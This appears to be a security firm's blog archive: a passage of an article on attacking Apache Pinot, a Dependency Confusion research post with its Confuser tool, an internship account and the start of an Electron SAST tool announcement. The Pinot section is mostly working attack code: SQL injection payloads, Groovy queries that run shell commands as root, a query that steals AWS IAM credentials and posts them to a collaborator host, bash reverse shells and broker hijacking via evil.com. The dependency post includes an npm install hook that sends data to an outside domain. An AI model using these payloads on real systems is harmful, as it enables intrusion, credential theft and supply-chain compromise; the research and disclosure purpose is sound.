Limited support. The subquery is supposed to return a base64-encoded IdSet. An IdSet is a data structure (compressed bitmap or Bloom filter) where it is very fast to check if an Id belongs in the IdSet. The IN_SUBQUERY (filtered on Broker) or IN_PARTITIONED_SUBQUERY (filtered on Server) functions perform the subquery and then use this IdSet to filter results from the main query.

WHERE IN_SUBQUERY(
  yearID,
  'SELECT ID_SET(yearID) FROM baseballStats WHERE teamID = ''BC'''
  ) = 1

Database Version

It is common to SELECT @@VERSION or SELECT VERSION() when fingerprinting database servers. Pinot lacks this feature. Instead, the presence or absence of functions and other language features must be used to identify a Pinot server version.

Information Schema Tables

No.

Data Types

Some Pinot functions are sensitive to the column types in use (INT, LONG, BYTES, STRING, FLOAT, DOUBLE). The hash functions like SHA512, for instance, will only operate on BYTES columns and not STRING columns. Luckily, we can find the undocumented toUtf8 function in the source code and convert strings into bytes:

SELECT md5(toUtf8(somestring)) FROM table

CASE

Simple case:

SELECT
  CASE firstName WHEN 'Lucy' THEN 1 WHEN 'Bob', 'Nick' THEN 2 ELSE 'x' END
FROM transcript

Searched case:

SELECT
  CASE WHEN firstName = 'Lucy' THEN 1 WHEN firstName = 'Bob' THEN 2.1 ELSE 'x' END
FROM transcript

Query Options

Certain query options such as timeouts can be added with OPTION(key=value,key2=value2). Strangely enough, this can be added anywhere inside the query, and I mean anywhere!

SELECT studentID, firstOPTION(timeoutMs=1)Name
froOPTION(timeoutMs=1)m tranOPTION(timeoutMs=2)script
WHERE firstName OPTION(timeoutMs=1000) = 'Lucy'
-- succeeds as the final timeoutMs is long (1000ms)

SELECT * FROM transcript WHERE REGEXP_LIKE(firstName, 'LuOPTION(timeoutMs=1)cy')
-- BrokerTimeoutError:
-- Query timed out (time spent: 4ms, timeout: 1ms) for table: transcript_OFFLINE before scattering the request
--
-- With timeout 10ms, the error is:
-- 427: 1 servers [pinot-server-0_O] not responded
--
-- With an even larger timeout value the query succeeds and returns results for 'Lucy'.

Yes, even inside strings!

In a Pinot-backed search API, queries for thingumajig and thinguOPTION(a=b)majig should return identical results, assuming the characters ()= are not filtered by the API.

This is also potentially a useful WAF bypass.

They're the same picture meme

CTF-grade SQL injection

In far-fetched scenarios, this could be used to comment out parts of a SQL query, e.g. a route /getFiles?category=)&title=%25oPtIoN( using a prepared statement to produce the SQL:

SELECT * FROM gchqFiles
WHERE
  title LIKE '%oPtIoN('
  and topSecret = false
  and category LIKE ')'

Everything between OPTION( and the next ) is stripped out using regex /option\s*\([^)]+\)/i. The query gets executed as:

SELECT * FROM gchqFiles
WHERE
  title LIKE '%'

allowing access to all the top secret files!

Note that the error OPTION statement requires two parts separated by '=' occurs if there are the wrong number of equals signs inside the OPTION().

Another contrived scenario could result in SQLi and a filter bypass.

SELECT * FROM gchqFiles
WHERE
  REGEXP_LIKE(title, 'oPtIoN(a=b')
  and not topSecret
  and category = ') OR id - id = 0--'

will be processed as

SELECT * FROM gchqFiles
WHERE
  REGEXP_LIKE(title, '
  and not topSecret
  and category = ') OR id - id = 0

Timeouts

Timeouts do not work. While the Broker returns a timeout exception to the client when the query timeout is reached, the Server continues processing the query row by row until completion, however long that takes. There is no way to cancel an in-progress query besides killing the Server process.

SQL Injection in Pinot

To proceed, you’ll need a SQL injection vulnerability like for any type of database backend, where malicious user input can wind up in the query body rather than being sent as parameters with prepared statements.

Pinot backends do not support prepared statements, but the Java client has a PreparedStatement class which escapes single quotes before sending the request to the Broker and can prevent SQLi (except the OPTION() variety).

Injection may appear in a search query such as:

query = """SELECT order_id, order_details_json FROM orders
WHERE store_id IN ({stores})
  AND REGEXP_LIKE(product_name,'{query}')
  AND refunded = false""".format(
    stores=user.stores,
    query=request.query,
)

The query parameter can be abused for SQL injection to return all orders in the system without the restriction to specific store IDs. An example payload is !xyz') OR store_id - store_id = 0 OR (product_name = 'abc! which will produce the following SQL query:

SELECT order_id, order_details_json FROM orders
WHERE store_id IN (12, 34, 56)
  AND REGEXP_LIKE(product_name,'!xyz') OR store_id - store_id = 0 OR (product_name = 'abc!')
  AND refunded = false

The logical split happens on the OR, so records will be returned if either:

  • store_id IN (12, 34, 56) AND REGEXP_LIKE(product_name,'!xyz') (unlikely to have any results)
  • store_id - store_id = 0 (always true, so all records are returned)
  • (product_name = 'abc!') AND refunded = false (unlikely to have any results)

If the query template used by the target has no new lines, the query can alternatively be ended with a line comment !xyz') OR store_id - store_id = 0--.

RCE via Groovy

While maturity is bringing improvements, secure design has not always been a priority. Pinot trusts anyone who can query the database to also execute code on the Server, as root 😲. This feature gaping security hole is enabled by default in all released versions of Apache Pinot. It was disabled by default in a commit on May 17, 2022 but this commit has not yet made it into a release.

Scripts are written in the Groovy language. This is a JVM-based language, allowing you to use all your favourite Java methods. Here’s some Groovy syntax you might care about:

// print to Server log (only going to be useful when testing locally)
println 3
// make a variable
def data = 'abc'
// interpolation by using double quotes and $ARG or ${ARG}
def moredata = "${data}def"  // abcdef
// execute shell command, wait for completion and then return stdout
'whoami'.execute().text
// launch shell command, but do not wait for completion
"touch /tmp/$arg0".execute()
// execute shell command with array syntax, helps avoid quote-escaping hell
["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/53 0>&1 &"].execute()
// a semicolon must be placed after the final closing bracket of an if-else block
if (true) { a() } else { b() }; return "a"

To execute Groovy, use:

GROOVY(
  '{"returnType":"INT or STRING or some other data type","isSingleValue":true}',
  'groovy code on one line',
  MaybeAColumnName,
  MaybeAnotherColumnName
)

If columns (or transform functions) are specified after the groovy code, they appear as variables arg0, arg1, etc. in the Groovy script.

RCE Example Queries

Whoami

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  'println "whoami".execute().text; return 1'
) = 1 limit 5

Prints root to the log! The official Pinot docker images run Groovy scripts as root.

Note that:

  1. The Groovy function is an exception to the earlier rule requiring filters to include a column name.
  2. Even though the limit is 5, every row in each segment being searched is processed. Once 5 rows are reached, the query returns results to the Broker, but the root lines continue being printed to the log.
  3. The return and comparison values need not be the same. However the types must match returnType in the metadata JSON (here INT).
  4. The return keyword is optional for the final statement, so the script could could end with ; 1.
SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  'println "hello $arg0"; "touch /tmp/id-$arg0".execute(); 42',
  id
) = 3

In /tmp, expect root-owned files id-1, id-2, id-3, etc. for each row.

AWS

Steal temporary AWS IAM credentials from pinot-server.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  CONCAT(CONCAT(CONCAT(CONCAT(
    'def aws = "169.254.169.254/latest/meta-data/iam/security-credentials/";',
    'def collab = "xyz.burpcollaborator.net/";',
''),'def role = "curl -s ${aws}".execute().text.split("\n")[0].trim();',
''),'def creds = "curl -s ${aws}${role}".execute().text;',
''),'["curl", collab, "--data", creds].execute(); 0',
  '')
) = 1

Could give access to cloud resources like S3. The code can of course be adapted to work with IMDSv2.

Reverse Shell

The goal is really to have a root shell from which to explore the cluster at your leisure without your commands appearing in query logs. You can use the following:

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/443 0>&1 &"].execute(); return 1'
) = 1

to spawn loads of reverse shells at the same time, one per row.

root@pinot-server-1:/opt/pinot#

You will be root on whichever Server instances are chosen by the broker based on which Servers contain the required table segments for the query.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"STRING","isSingleValue":true}',
  '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &"].execute().text'
) = 'x'

This launches one reverse shell. If you accidentally kill the shell, however far into the future, a new reverse shell attempt will be spawned as the Server processes the next row. Yes, the client and Broker will see the query timeout, but the Server will continue executing the query until completion.

Tuning

When coming across Pinot for the first time on an engagement, we used a Groovy query similar to the AWS one above. However, as you can already guess, this launched tens of thousands of requests at Burp Collaborator over a span of several hours with no way to stop the runaway query besides confessing our sin to the client.

To avoid spawning thousands of processes and causing performance degradation and potentially a Denial of Service, limit execution to a single row with an if statement in Groovy.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  CONCAT(CONCAT(CONCAT(CONCAT(
    'if (arg0 == "489") {',
    '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &"].execute();',
''),'return 1;',
''),'};',
''),'return 0',
  ''),
  id
) = 1

A reverse shell is spawned only for the one row with id 489.

Use RCE on Server to Attack Other Nodes

We have root access to a Server via our reverse shell, giving us access to:

  • All the segment data stored on the Server
  • Configuration and environment variables with the locations of other services such as Broker and Zookeeper
  • Potentially keys to the cloud environment with juicy IAM permissions

As we’re root here already, let’s try to use our foothold to affect other parts of the Pinot cluster such as Zookeeper, Brokers, Controllers, and other Servers.

First we should check the configuration.

root@pinot-server-1:/opt/pinot# cat /proc/1/cmdline | sed 's/\x00/ /g'
/usr/local/openjdk-11/bin/java -Xms512M ... -Xlog:gc*:file=/opt/pinot/gc-pinot-server.log -Dlog4j2.configurationFile=/opt/pinot/conf/log4j2.xml -Dplugins.dir=/opt/pinot/plugins -Dplugins.dir=/opt/pinot/plugins -classpath /opt/pinot/lib/*:...:/opt/pinot/plugins/pinot-file-system/pinot-s3/pinot-s3-0.10.0-SNAPSHOT-shaded.jar -Dapp.name=pinot-admin -Dapp.pid=1 -Dapp.repo=/opt/pinot/lib -Dapp.home=/opt/pinot -Dbasedir=/opt/pinot org.apache.pinot.tools.admin.PinotAdministrator StartServer -clusterName pinot -zkAddress pinot-zookeeper:2181 -configFileName /var/pinot/server/config/pinot-server.conf

We have a Zookeeper address -zkAddress pinot-zookeeper:2181 and config file location -configFileName /var/pinot/server/config/pinot-server.conf. The file contains data locations and auth tokens in the unlikely event that internal cluster authentication has been enabled.

Zookeeper

It is likely that the locations of other services are available as environment variables, however the source of truth is Zookeeper. Nodes must be able to read and write to Zookeeper to update their status.

root@pinot-server-1:/opt/pinot# cd /tmp
root@pinot-server-1:/tmp# wget -q https://dlcdn.apache.org/zookeeper/zookeeper-3.8.0/apache-zookeeper-3.8.0-bin.tar.gz && tar xzf apache-zookeeper-3.8.0-bin.tar.gz
root@pinot-server-1:/tmp# ./apache-zookeeper-3.8.0-bin/bin/zkCli.sh -server pinot-zookeeper:2181
Connecting to pinot-zookeeper:2181
...
2022-06-06 20:53:52,385 [myid:pinot-zookeeper:2181] - INFO  [main-SendThread(pinot-zookeeper:2181):o.a.z.ClientCnxn$SendThread@1444] - Session establishment complete on server pinot-zookeeper/10.103.140.149:2181, session id = 0x10000046bac0016, negotiated timeout = 30000
...
[zk: pinot-zookeeper:2181(CONNECTED) 0] ls /pinot/CONFIGS/PARTICIPANT
[Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099, Controller_pinot-controller-0.pinot-controller-headless.pinot-quickstart.svc.cluster.local_9000, Minion_pinot-minion-0.pinot-minion-headless.pinot-quickstart.svc.cluster.local_9514, Server_pinot-server-0.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098, Server_pinot-server-1.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098]

Now we have the list of “participants” in our Pinot cluster. We can get the configuration of a Broker:

[zk: pinot-zookeeper:2181(CONNECTED) 1] get /pinot/CONFIGS/PARTICIPANT/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099
{
  "id" : "Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099",
  "simpleFields" : {
    "HELIX_ENABLED" : "true",
    "HELIX_ENABLED_TIMESTAMP" : "1654547467392",
    "HELIX_HOST" : "pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local",
    "HELIX_PORT" : "8099"
  },
  "mapFields" : { },
  "listFields" : {
    "TAG_LIST" : [ "DefaultTenant_BROKER" ]
  }
}

By modifying the broker HELIX_HOST in Zookeeper (using set), Pinot queries will be sent via HTTP POST to /query/sql on a machine you control rather than the real broker. You can then reply with your own results. While powerful, this is a rather disruptive attack.

In further mitigation, it will not affect services which send requests directly to a hardcoded Broker address. Many clients do rely on Zookeeper or the Controller to locate the broker, and these clients will be affected. We have not investigated whether intra-cluster mutual TLS would downgrade this attack to DoS.

Broker

We discovered the location of the broker. Its HELIX_PORT refers to the an HTTP server used for submitting SQL queries:

curl -H "Content-Type: application/json" -X POST \
   -d '{"sql":"SELECT X FROM Y"}' \
   http://pinot-broker-0:8099/query/sql

Sending queries directly to the broker may be much easier than via the SQLi endpoint. Note that the broker may have basic auth enabled, but as with all Pinot services it is disabled by default.

All Pinot REST services also have an /appconfigs endpoint returning configuration, environment variables and java versions.

Other Servers

There may be data which is only present on other Servers. From your reverse shell, SQL queries can be sent to any other Server via GRPC without requiring authentication.

Alternatively, we can go back and use Pinot’s IdSet subquery functionality to get shells on other Servers. We do this by injecting an IN_SUBQUERY(columnName, subQuery) filter into our original query to tableA to produce SQL like:

SELECT * FROM tableA
  WHERE
    IN_SUBQUERY(
      'x',
      'SELECT ID_SET(firstName) FROM tableB WHERE groovy(''{"returnType":"INT","isSingleValue":true}'',''println "RCE";return 3'', studentID)=3'
    ) = true

It is important that the tableA column name (here the literal 'x') and the ID_SET column of the subquery have the same type. If an integer column from tableB is used instead of firstName, the 'x' must be replaced with an integer.

We now get RCE on the Servers holding segments of tableB.

Controller

The Controller also has a useful REST API.

It has methods for getting and setting data such as cluster configuration, table schemas, instance information and segment data.

It can be used to interact with Zookeeper e.g. to update the broker host like was done directly via Zookeeper above.

curl -X PUT "http://localhost:9000/instances/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099?updateBrokerResource=true" -H  "accept: application/json" -H  "Content-Type: application/json" -d "{  \"instanceName\": \"Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099\",  \"host\": \"evil.com\",  \"enabled\": true,  \"port\": \"8099\",  \"tags\": [\"DefaultTenant_BROKER\"],  \"type\":\"BROKER\",  \"pools\": null,  \"grpcPort\": -1,  \"adminPort\": -1,  \"systemResourceInfo\": null}"

Files can also be uploaded for ingestion into tables.

TLDR

  • Pinot is a modern database platform that can be attacked with old-school SQLi
  • SQL injection leads to Remote Code Execution by default in the latest release, at the time of writing
  • In the official container images, RCE means root on the Server component of the Pinot cluster
  • From here, other components can be affected to a certain degree
  • WTF is going on with OPTION()?
  • Pinot is under active development. Maturity will bring security improvements
  • In an upcoming release (>0.10.0) the SQLi to RCE footgun will be opt-in

Dependency Confusion

20 July 2022 at 22:00

On Feb 9th, 2022 PortSwigger announced Alex Birsan’s Dependency Confusion as the winner of the Top 10 web hacking techniques of 2021. Over the past year this technique has gained a lot of attention. Despite that, in-depth information about hunting for and mitigating this vulnerability is scarce.

I have always believed the best way to understand something is to get hands-on experience. In the following post, I’ll show the results of my research that focused on creating an all-around tool (named Confuser) to test and exploit potential Dependency Confusion vulnerabilities in the wild. To validate the effectiveness, we looked for potential Dependency Injection vulnerabilities in top ElectronJS applications on Github (spoiler: it wasn’t a great idea!).

The tool has helped Doyensec during engagements to ensure that our clients are safe from this threat, and we believe it can facilitate testing for researchers and blue-teams too.

So… what is Dependency Confusion?

Dependency confusion is an attack against the build process of the application. It occurs as a result of a misconfiguration of the private dependency repositories. Vulnerable configurations allow downloading versions of local packages from a main public repository (e.g., registry.npmjs.com for NPM). When a private package is registered only in a local repository, an attacker can upload a malicious package to the main repository with the same name and higher version number. When a victim updates their packages, malicious code will be downloaded and executed on a build or developer machine.

Why is it so hard to study Dependency Injection?

There are multiple reasons why, despite all the attention, Dependency Confusion seems to be so unexplored.

There are plenty of dependency management systems

Each programming language utilizes different package management tools, most with their own repositories. Many languages have multiple of them. JavaScript alone has NPM, Yarn and Bower to name a few. Each tool comes with its own ecosystem of repositories, tools, options for local package hosting (or lack thereof). It is a significant time cost to include another repository system when working with projects utilizing different technology stacks.

In my research I have decided to focus on the NPM ecosystem. The main reason for that is its popularity. It’s a leading package management system for JavaScript and my secondary goal was to test ElectronJS applications for this vulnerability. Focusing on NPM would guarantee coverage on most of the target applications.

Actual exploitation requires interaction with 3rd party services

In order to exploit this vulnerability, the researcher needs to upload a malicious package to a public repository. Rightly so, most of them actively work against such practices. On NPM, malicious packages are flagged and removed along with banning of the owner account.

During the research, I was interested in observing how much time an attacker has before their payload is removed from the repository. Additionally, NPM is not actually a target of the attack, so among my goals was to minimize the impact on the platform itself and its users.

Reliable information extraction from targets is hard

In the case of a successful exploitation, a target machine is often a build machine inside a victim organization’s network. While it is a great reason why this attack is so dangerous, extracting information from such a network is not always an easy task.

In his original research, Alex proposes DNS extraction technique to extract information of attacked machines. This is the technique I have decided to use too. It requires a small infrastructure with a custom DNS server, unlike most web exploitation attacks, where often only an HTTP Proxy or browser is enough. This highlights why building tools such as mine is essential, if the community is to hunt these bugs reliably.

The tool

So, how to deal with those problems? I have decided to try and create Confuser - a tool that attempts to solve the aforementioned issues.

The tool is OSS and available at https://github.com/doyensec/confuser.

Be respectful and don’t create problems to our friends at NPM!

The process

Researching any Dependency Confusion vulnerability consists of three steps.

Step 1) Reconnaissance

Finding Dependency Confusion bugs requires a package file that contains a list of application dependencies. In case of projects utilizing NPM, the package.json file holds such information:

{
  "name": "Doyensec-Example-Project",
  "version": "1.0.0",
  "description": "This is an example package. It uses two dependencies: one is a public one named axios. The other one is a package hosted in a local repository named doyensec-library.",
  "main": "index.js",
  "author": "Doyensec LLC <[email protected]>",
  "license": "ISC",
  "dependencies": {
    "axios": "^0.25.0",
    "doyensec-local-library": "~1.0.1",
    "another-doyensec-lib": "~2.3.0"
  }
}

When a researcher finds a package.json file, their first task is to identify potentially vulnerable packages. That means packages that are not available in the public repository. The process of verifying the existence of a package seems pretty straightforward. Only one HTTP request is required. If a response status code is anything but 200, the package probably does not exist:

def check_package_exists(package_name):
    response = requests.get(NPM_ADDRESS + "package/" + package_name, allow_redirects=False)

    return (response.status_code == 200)

Simple? Well… almost. NPM also allows scoped package names formatted as follows: @scope-name/package-name. In this case, package can be a target for Dependency Confusion if an attacker can register a scope with a given name. This can be also verified by querying NPM:

def check_scope_exists(package_name):
    split_package_name = package_name.split('/')
    scope_name = split_package_name[0][1:]
    response = requests.get(NPM_ADDRESS + "~" + scope_name, alow_redirects=False)

The tool I have built allows the streamlining of this process. A researcher can upload a package.json file to my web application. In the backend, the file will be parsed, and have its dependencies iterated. As a result, a researcher receives a clear table with potentially vulnerable packages and the versions for a given project:

Vulnerable packages view

The downside of this method is the fact, that it requires enumerating the NPM service and dozens of HTTP requests per each project. In order to ease the strain put on the service, I have decided to implement a local cache. Any package name that has been once identified as existing in the NPM registry is saved in the local database and skipped during consecutive scans. Thanks to that, there is no need to repeatedly query the same packages. After scanning about 50 package.json files scraped from Github I have estimated that the caching has decreased the number of required requests by over 40%.

Step 2) Payload generation and upload

Successful exploitation of a Dependency Confusion vulnerability requires a package that will call home after it has been installed by the victim. In the case of the NPM, the easiest way to do this is by exploiting install hooks. NPM packages allow hooks that ran each time a given package is installed. Such functionality is the perfect place for a dependency payload to be triggered. The package.json template I used looks like the following:

{
  "name": {package_name},
  "version": {package_version},
  "description": "This package is a proof of concept used by Doyensec LLC to conduct research. It has been uploaded for test purposes only. Its only function is to confirm the installation of the package on a victim's machines. The code is not malicious in any way and will be deleted after the research survey has been concluded. Doyensec LLC does not accept any liability for any direct, indirect, or consequential loss or damage arising from the use of, or reliance on, this package.",
  "main": "index.js",
  "author": "Doyensec LLC <[email protected]>",
  "license": "ISC",
  "dependencies": { },
  "scripts": {
    "install": "node extract.js {project_id}"
  }
}

Please note the description that informs users and maintainers about the purpose of the package. It is an attempt to distinguish the package from a malicious one, and it serves to inform both NPM and potential victims about the nature of the operation.

The install hook runs the extract.js file which attempts to extract minimal data about the machine it has been run on:

const https = require('https');
var os = require("os");
var hostname = os.hostname();

const data = new TextEncoder().encode(
  JSON.stringify({
    payload: hostname,
    project_id: process.argv[2]
  })
);

const options = {
  hostname: process.argv[2] + '.' + hostname + '.jylzi8mxby9i6hj8plrj0i6v9mff34.burpcollaborator.net',
  port: 443,
  path: '/',
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Content-Length': data.length
  },
  rejectUnauthorized: false
}

const req = https.request(options, res => {});
req.write(data);
req.end();

I’ve decided to save time on implementing a fake DNS server and use the existing infrastructure provided by Burp Collaborator. The file will use a given project’s ID and victim’s hostname as subdomains and try to send an HTTP request to the Burp Collaborator domain. This way my tool will be able to assign callbacks to proper projects along with the victims’ hostnames.

After the payload generation, the package is published to the public NPM repository using the npm command itself: npm publish.

Step 3) Callback aggregation

The final step in the chain is receiving and aggregating the callbacks. As stated before, I have decided to use a Burp Collaborator infrastructure. To be able to download callbacks to my backend I have implemented a simple Burp Collaborator client in Python:

class BurpCollaboratorClient():

    BURP_DOMAIN = "polling.burpcollaborator.net"

    def __init__(self, colabo_key, colabo_subdomain):
        self.colabo_key = colabo_key
        self.colabo_subdomain = colabo_subdomain

    def poll(self):
        params = {"biid": self.colabo_key}
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"}

        response = requests.get(
            "https://" + self.BURP_DOMAIN + "/burpresults", params=params, headers=headers)#, proxies=PROXIES, verify=False)

        if response.status_code != 200:
            raise Error("Failed to poll Burp Collaborator")

        result_parsed = json.loads(response.text)
        return result_parsed.get("responses", [])

After polling, the returned callbacks are parsed and assigned to the proper projects. For example if anyone runs npm install on an example project I have shown before, it’ll render the following callbacks in the application:

Callbacks

Test run

To validate the effectiveness of Confuser, we decided to test Github’s top 50 ElectronJS applications.

I have extracted a list of Electron Applications from the official ElectronJS repository available here. Then, I used the Github API to sort the repositories by the number of stars. For the top 50, I have scraped the package.json files.

This is the Node script to scrape the files:

for (i = 0; i < 50 && i < repos.length;) {
    let repo = repos[i]
    await octokit
      .request("GET /repos/" + repo.repo + "/commits?per_page=1", {})
      .then((response) => {
        var sha = response.data[0].sha
        return octokit.request("GET /repos/" + repo.repo + "/git/trees/:sha?recursive=1", {
          "sha": sha
        });
      })
      .then((response) => {
        for (file_index in response.data.tree) {
          file = response.data.tree[file_index];
          if (file.path.endsWith("package.json")) {
            return octokit.request("GET /repos/" + repo.repo + "/git/blobs/:sha", {
              "sha": file.sha
            });
          }
        }

        return null;
      })
      .then((response) => {
        if (!response) return null;
        i++;
        var package_json = Buffer.from(response.data.content, 'base64').toString('utf-8');
        repoNameSplit = repo.repo.split('/');
        return fs.writeFileSync("package_jsons/" + repoNameSplit[0]+ '_' + repoNameSplit[1] + ".json", package_json);
      });
  }

The script takes the newest commit from each repo and then recursively searches its files for any named package.json. Such files are downloaded and saved locally.

After downloading those files, I uploaded them to the Confuser tool. It resulted in scanning almost 3k dependency packages. Unfortunately only one application had some potential targets. As it turned out, it was taken from an archived repository, so despite having a “malicious” package in the NPM repository for over 24h (after which, it was removed by NPM) I’d received no callbacks from the victim. I had received a few callbacks from some machines that seemed to have downloaded the application for analysis. This also highlighted a problem with my payload - getting only the hostname of the victim might not be enough to distinguish an actual victim from false positives. A more accurate payload might involve collecting information such as local paths and local users which opens up to privacy concerns.

Example false positives: False positives

In hindsight, it was a pretty naive approach to scrape package.json files from public repositories. Open Source projects most likely use only public dependencies and don’t rely on any private infrastructures. On the last day of my research, I downloaded a few closed source Electron apps. Unpacking them, I was able to extract the package.json in many cases but none yield any interesting results.

Summary

We’re releasing Confuser - a newly created tool to find and test for Dependency Confusion vulnerabilities. It allows scanning packages.json files, generating and publishing payloads to the NPM repository, and finally aggregating the callbacks from vulnerable targets.

This research has allowed me to greatly increase my understanding of the nature of this vulnerability and the methods of exploitation. The tool has been sufficiently tested to work well during Doyensec’s engagements. That said, there are still many improvements that can be done in this area:

  • Implement its own DNS server or at least integrate with Burp’s self-hosted Collaborator server instances

  • Add support for other languages and repositories

Additionally, there seems to be several research opportunities in the realm of Dependency Confusion vulnerabilities:

  • It seems promising to expand the research to closed-source ElectronJS applications. While high profile targets like Microsoft will probably have their bases covered in that regard (also because they were targeted by the original research), there might be many more applications that are still vulnerable

  • Researching other dependency management platforms. The original research touches on NPM, Ruby Gems, Python’s PIP, JFrog and Azure Artifacts. It is very likely that similar problems exist in other environments

My Internship Experience at Doyensec

23 August 2022 at 22:00

Throughout the Summer of 2022, I worked as an intern for Doyensec. I’ll be describing my experience with Doyensec in this blog post so that other potential interns can decide if they would be interested in applying.

The Recruitment Process

The recruitment process began with a non-technical call about the internship to make introductions and exchange more information. Once everyone agreed it was a fit, we scheduled a technical challenge where I was given two hours to provide my responses. I enjoyed the challenge and did not find it to be a waste of time. After the technical challenge, I had two technical interviews with different people (Tony and John). I thought these went really well for questions about web security, but I didn’t know the answers to some questions about other areas of application security I was less familiar with. Since Doyensec performs assessments of non-web applications as well (mobile, desktop, etc.), it made sense that they would ask some questions about non-web topics. After the final call, I was provided with an offer via email.

The Work

As an intern, my time was divided between working on an internal training presentation, conducting research, and performing security assessments. Creating the training presentation allowed me to learn more about a technical topic that will probably be useful for me in the future, whether at Doyensec or not. I used some of my research time to learn about the topic and make the presentation. My presentation was on the advanced features of Semgrep, the open-source static code analysis tool. Doyensec often has cross-training sessions where members of the team demonstrate new tools and techniques, or just the latest “Best Bug” they found on an engagement.

Conducting research was a good experience as an intern because it allowed me to learn more about the research topic, which in my case was Electron and its implementation of web API permissions. Don’t worry too much about not having a good research topic of your own already – there are plenty of things that have already been selected as options, and you can ask for help choosing a topic if you’re not sure what to research. My research topic was originally someone else’s idea.

My favorite part of the internship was helping with security assessments. I was able to work as a normal consultant with some extra guidance. I learned a lot about different web frameworks and programming languages. I was able to see what technologies real companies are using and review real source code. For example, before the internship, I had very limited experience with applications written in Go, but now I feel mostly comfortable testing Go web applications. I also learned more about mobile applications, which I had limited experience with. In addition to learning, I was able to provide actionable findings to businesses to help reduce their risk. I found vulnerabilities of all severities and wrote reports for these with recommended remediation steps.

Should You Become an Intern?

When I was looking for an internship, I wanted to find a role that would let me learn a lot. Most of the other factors were low-priority for me because the role is temporary. If you really enjoy application security and want to learn more about it, this internship is a great way to do that. The people at Doyensec are very knowledgeable about a wide variety of application security topics, and are happy to share their knowledge with an intern.

Even though my priority was learning, it was also nice that the work is performed remotely and with flexible hours. I found that some days I preferred to stop work at around 2-3 PM and then continue in the night. I think these conditions are desirable to anyone, not just interns.

As for qualifications, Doyensec has stated that the ideal candidate:

  • Already has some experience with manual source code review and Burp Suite / OWASP ZAP
  • Learns quickly
  • Should be able to prepare reports in English
  • Is self-organized
  • Is able to learn from his/her mistakes
  • Has motivation to work/study and show initiative
  • Must be communicative (without this it is difficult to teach effectively)
  • Brings something to the mix (e.g., creativity, academic knowledge, etc.)

My experience before the internship consisted mostly of bug bounty hunting and CTFs. There are not many other opportunities for college students with zero experience, so I had spent nearly two years bug hunting part-time before the internship. I also had the OSWE certification to demonstrate capability for source code review, but this is definitely not required (they’ll test you anyway!). Simply being an active participant in CTFs with a focus on web security and code review may be enough experience. You may also have some other way of learning about web security if you don’t usually participate in CTFs.

Final Thoughts

I enjoyed my internship at Doyensec. There was a good balance between learning and responsibility that has prepared me to work in an application security role at Doyensec or elsewhere.

If you’re interested in the role and think you’d make a good fit, apply via our careers page: https://www.careers-page.com/doyensec-llc. We’re now accepting candidates for the Fall Internship 2022.

ElectroNG, our premium SAST tool released!

5 September 2022 at 22:00

As promised in November 2021 at Hack In The Box #CyberWeek event in Abu Dhabi, we’re excited to announce that ElectroNG is now available for purchase at https://get-electrong.com/.

ElectronNG UI

Our premium SAST tool for Electron applications is the result of many years of applied R&D! Doyensec has been the leader in Electron security since being the first security company to publish a comprehensive security overview of the Electron framework during BlackHat USA 2017. Since then, we have reported dozens of vulnerabilities in the framework itself and popular Electron-based applications.

A bit of history

We launched Electronegativity OSS at the beginning of 2019 as a set of scripts to aid the manual auditing of Electron apps. Since then, we’ve released numerous updates, educated developers on security best practices, and grown a strong community around Electron application security. Electronegativity is even mentioned in the official security documentation of the framework.

At the same time, Electron has established itself as the framework of choice for developing multi-OS desktop applications. It is now used by over a thousand public desktop applications and many more internal tools and custom utilities. Major tech companies are betting on this technology by devoting significant resources to it, and it is now evident that Electron is here to stay.

What’s new?

Considering the evolution of the framework and emerging threats, we had quickly realized that Electronegativity was in need of a significant refresh, in terms of detection and features, to be able to help modern companies in “building with security”.

At the end of 2020, we sat down to create a project roadmap and created a development team to work on what is now ElectroNG. In this blog post, we will highlight some of the major improvements over the OSS version. There is much more under the hood, and we will be covering more features in future posts and presentations.

ElectronNG UI

User Interface

If you’ve ever used Electronegativity, it would be obvious that ElectroNG is no longer a command-line tool. Instead, we’ve built a modern desktop app (using Electron!).


Better Detection, More Checks

ElectroNG features a new decision mechanism to flag security issues based on improved HTML/JavaScript/Typescript parsing and new heuristics. After developing that, we improved all existing atomic and conditional checks to reduce the number of false positives and improve accuracy. There are now over 50 checks to detect misconfigurations and security vulnerabilities!

However, the most significant improvement revolves around the creation of Electron-dependent checks. ElectroNG will attempt to determine the specific version of the framework in use by the application and dynamically adjust the scan results based on that. Considering that Electron APIs and options change very frequently, this boosts the tool’s reliability in determining things that matter.

To provide a concrete example to the reader, let’s consider a lesser-known setting named affinity. Electron v2 introduced a new BrowserView/BrowserWindow webPreferences option for gathering several windows into a single process. When specified, web pages loaded by BrowserView/BrowserWindow instances with the same affinity will run in the same renderer process. While this setting was meant to improve performance, it leads to unexpected results across different Electron versions.

Let’s consider the following code snippet:

function createWindow () {
  // Create the browser window.
  firstWin = new BrowserWindow({
    width: 800,
    height: 600,
    webPreferences: {
      nodeIntegration: true,
      affinity: "secPrefs"
    }
  })

  secondWin = new BrowserWindow({
    width: 800,
    height: 600,
